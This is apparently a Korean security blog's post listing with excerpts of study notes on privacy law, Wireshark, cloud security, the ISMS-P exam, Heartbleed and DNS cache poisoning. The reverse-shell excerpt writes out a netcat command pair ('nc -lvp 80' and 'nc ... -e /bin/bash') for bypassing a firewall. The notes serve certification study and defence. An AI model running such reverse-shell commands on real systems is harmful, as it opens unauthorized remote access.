전체 글112 개인정보보호법 트레이닝 사이트 https://itallpass.com/ismsp/law.htm https://itallpass.com/ismsp/law.htm itallpass.com https://blog.naver.com/renucs/221798711693 (개정)개인정보보호법, 정보통신망법[2020.8.5시행] 데이터3법(개보법, 정보통신망법, 신용정보법)개정에 따른 법 개정이 공포되었고, 8월5일부터 시행됩니다. ... blog.naver.com 2021. 5. 17. WireShark 들어가기 전에(2) Cache 지우기 DNS Cache about:blank ipconfig /displaydns ipconfig /flushdns * wireshark - Length 1514 --> 1460 1.OSI 7 layer에서 각 계층의 PDU를 무엇이라고 하나요? - L1=>bit - L2=>Frame - L3=>Packet - L4=>Segment - L5~L7=>Data Stream 2. TCP/IP 4계층의 상위 연결 정보를 쓰세요. - Application Layer - Transport Layer(TCP,UDP+port number_2byte) - Internet layer(IP+protocol ID-1byte) - Network Access Layer(EthernetII+type_2byte) ---.. 2021. 5. 17. WireShark 들어가기 전에(1) 1. TCP/IP 이해하기 2. WireShark 메뉴 알기 3. 서비스 트래픽 흐름 알기 ----------------------------------------------------------- 1. https://ko.wikipedia.org/wiki/IPv4#헤더 IPv4 - 위키백과, 우리 모두의 백과사전 위키백과, 우리 모두의 백과사전. IPv4는ps://ip.pe.kr 인터넷 프로토콜의 4번째 판이며, 전 세계적으로 사용된 첫 번째 인터넷 프로토콜이다. 과거에 인터넷에서 사용되는 유일한 프로토콜이였으나 ko.wikipedia.org 2. https://ko.wikipedia.org/wiki/전송_제어_프로토콜#TCP_세그먼트_구조 전송 제어 프로토콜 - 위키백과, 우리 모두의 백과사전 위키백.. 2021. 5. 17. 주요정보통신기반시설 기술적 취약점 분석.평가 방법 상세가이드 2021년 4월 업데이트 되었네요. www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=1&mode=view&p_No=259&b_No=259&d_No=106&ST=&SV= 주요정보통신기반시설 기술적 취약점 분석 평가 상세 가이드 융합기반보호팀 주성준 전화 061-820-1671 이메일 2021-04-28 95565 주요정보통신기반시설_기술적_취약점_분석_평가_방법_상세가이드.pdf 2021. 5. 13. 클라우드 보안 가이드 SK infosec.. 흠. 클라우드 보안 가이드 올해 EQST그룹에서는 '클라우드 보안 가이드 - AWS, Cloud Z', '클라우드 보안 가이드(컨테이너 보안) - Docker, Kubernetes'를 발간한 바 있습니다. 이번엔 국내 클라우드 플랫폼 중 AWS 다음으로 높은 점유율을 확보하고 있는 Azure, GCP(Google Cloud Platform)에 대한 클라우드 보안 가이드를 제시하고자 합니다.올해 EQST그룹에서는 '클라우드 보안 가이드 - AWS, Cloud Z', '클라우드 보안 가이드(컨테이너 보안) - Docker, Kubernetes'를 발간한 바 있습니다. 이번엔 국내 클라우드 플랫폼 중 AWS 다음으로 높은 점유율을 확보하고 있는 Azure, GCP(Google Cloud.. 2020. 12. 2. 2020년 ISMS-P 시험후기 2020.11.14 가락고등학교... 시험장 입실시 코로나 검사로 인해 40분정도 줄서기.. 시험 시작시간이 10분 늦게 시작 되었다.. 시험 문제 하나당 한페이지... 언어영역이 크다. 클라우드 보안영역에 대해 4개 문제 정도 출제된 듯 하다. 120분 시간이 모자르네... 흠. 그래도 딱 반 타작은 했네.. 2021년을 기약하며.. 2020. 12. 2. IXIA PerfectStorm BreakingPoint 정보보호제품 성능시험 계측기 기술 교육 www.kisis.or.kr/ Application simulator for HTTP Throughput Application simulator for HTTP TPS Security Attack DDoS Attack for SYN Flood 2020. 12. 2. 리버스 쉘 ( Revers Shell ) 1. 개요 1)내부침입, 무작위대입, 사전공격등으로 관리자(root)계정 탈취 2)반복적 침입을 위해 일반사용자로 위장한 관리자 계정 생성 3)지속적으로 원격 접속을 통하여 악의적 행위 수행 2. 공격기법 1)외부망에서 telnet , SSH 접속불가 2)방화벽 정책에 따라 Inbound 80,443/tcp만 허용 # netcat 프로그램 방화벽 우회 * 공격자 (123.0.0.1) * 공격대상 (234.0.0.1) 1) 공격자 --> ssh 234.0.0.1 ( 방화벽 차단 ) 2) nc -lvp 80 (공격자 포트 리슨상태) 3) 공격대상 서버( nc 123.0.0.1:80 -e /bin/bash // 내부에서 외부로 접속요청 ) 4) 접속성공 ( //방화벽에서 Outbound 80 오픈상태 ) **.. 2020. 11. 23. SSL/TLS Heart Bleed 1. 개요 1)Open SSL 라이브러리의 하트비트(Heart Beat)확장 모듈 취약점 활용 2)SSL 연결을 매번 재협상하지 않기 위해 상호간 연결 지속신호를 교환(Heart Beat) 3)클라이언트가 Payload 내용과 Payload 길이를 보내면 서버가 응답메세지를 전송 4)서버가 클라이언트의 요청 Payload 내용의 길이를 검증하지 않는 취약점 존재 5)서버의 시스템 메모리 정보가 유출될 수 있는 문제점 존재 2. 공격기법 1)공격자는 짧은 Payload 내용을 최대 Payload 길이 (64KB)로 조작하여 SSL서버로 전송 ex) Heart Beat : |'AB'|64KB| (최대) 2)취약한 버전의 SSL서버는 요청된 하트비트의 최대 Payload길이(64KB)만큼 자신의 시스템 메모리.. 2020. 11. 23. DNS Cache Poisoning 1. 개요 1)DNS 서버는 성능 향상을 위하여 캐시 정보를 사용하여 응답 2)상위 DNS로 반복적인 질의를 줄이기 위해 응답 정보를 캐시에 일정시간 유지 2. 공격 기법 1)공격자는 조작된 도메인 질의응답 메시지를 희생자 DNS에 다량으로 전송 2)이때 Transaction ID를 모르기 때문에 랜덤하게 다수의 응답 메시지를 생성 3)조작된 응답 중 정상응답 보다 먼저 일치되는 응답이 있으면 캐시에 저장 4)다수의 희생자 DNS서버 사용자들이 조작된 주소의 웹사이트로 접속 5)개인정보나 금융정보 유출 등의 2차 피해 발생 가능 3. 대응법 1)DNS 어플리케이션을 최신 패치 상태로 유지 2)도메인 관리용 DNS서버는 재귀적 질의를 허용하지 않도록 설정 3)DNSSEC으로 질의응답 정보 암호화 적용 2020. 11. 20. 이전 1 ··· 5 6 7 8 9 10 11 12 다음
